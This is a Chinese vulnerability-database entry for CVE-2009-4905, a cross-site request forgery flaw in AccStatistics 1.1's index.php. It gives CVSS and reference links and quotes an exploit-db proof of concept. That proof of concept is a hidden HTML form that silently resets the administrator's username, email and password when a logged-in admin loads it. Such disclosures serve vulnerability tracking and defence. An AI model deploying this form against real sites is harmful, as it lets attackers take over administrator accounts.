Acc Statistics 'index.php'多个跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1118762 漏洞类型 跨站请求伪造
发布时间 2009-12-13 更新时间 2010-06-25
CVE编号 CVE-2009-4905 CNNVD-ID CNNVD-201006-408
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/10406
https://www.securityfocus.com/bid/79117
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201006-408
|漏洞详情
AccStatisticsis一个免费的网站统计脚本。AccStatistics可以告诉你的访问者是如何找到你以及访问网站的访客人数。AccStatistics1.1的index.php存在多个跨站请求伪造漏洞。远程攻击者可以借助劫持管理员用户的认证请求修改(1)passwords,(2)usernames,和(3)e-mail地址。
|漏洞EXP
[-------------------------------------------------------------------------------------------------]
[   Title: AccStatistics v1.1 XSRF Vulnerability (Change Admin Settings)                          ]
[   Author: Milos Zivanovic                                                                       ]
[   Date: 13. December 2009.                                                                      ]
[-------------------------------------------------------------------------------------------------]

[-------------------------------------------------------------------------------------------------]
[   Application: AccStatistics                                                                    ]
[   Version: v1.1                                                                                 ]
[   Download: http://www.accstatistics.com/download/accstatistics.zip                             ]
[   Vulnerability: Cross Site Request Forgery                                                     ]
[-------------------------------------------------------------------------------------------------]

I've tested this on demo version where name attribute of submit button is 'preview'. I doubt that's
the name in the real thing. I don't know what is the name tag of it but it's usually 'submit' or
'save' (could be something other).

With this exploit we can change allot of stuff, but some of the most critical would be:
username, email, password...

[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/accstatistics/demo/index.php" method="POST">
  <input type="hidden" name="p" value="edit1">
  <input type="hidden" name="id" value="1">
  <input type="hidden" id="input_username" name="input_username" value="admin">
  <input type="hidden" id="input_email" name="input_email" value="my@email.com">
  <input type="password" id="input_password" name="input_password" value="hacked">
  <input type="password" id="input_password1" name="input_password1" value="hacked">
  <input type="hidden" id="input_sitename" name="input_sitename" value="AccStatistics">
  <input type="hidden" id="input_ignoredomains" name="input_ignoredomains" value="">
  <input type="hidden" id="input_ignoremyvisits" name="input_ignoremyvisits" value="1">
  <input type="hidden" id="input_ignoresubdomenins" name="input_ignoresubdomenins" value="1">
  <input type="hidden" id="input_rowsperpage" name="input_rowsperpage" value="30">
  <input type="checkbox" id="input_reset" name="input_reset" value="1">
  <input type="submit" name="preview" value="Save">
</form>

[EXPLOIT------------------------------------------------------------------------------------------]

[----------------------------------------------EOF------------------------------------------------]
|受影响的产品
Accscripts Acc Statistics 1.1
|参考资料

来源:VUPEN
名称:ADV-2009-3509
链接:http://www.vupen.com/english/advisories/2009/3509
来源:EXPLOIT-DB
名称:10406
链接:http://www.exploit-db.com/exploits/10406
来源:SECUNIA
名称:37694
链接:http://secunia.com/advisories/37694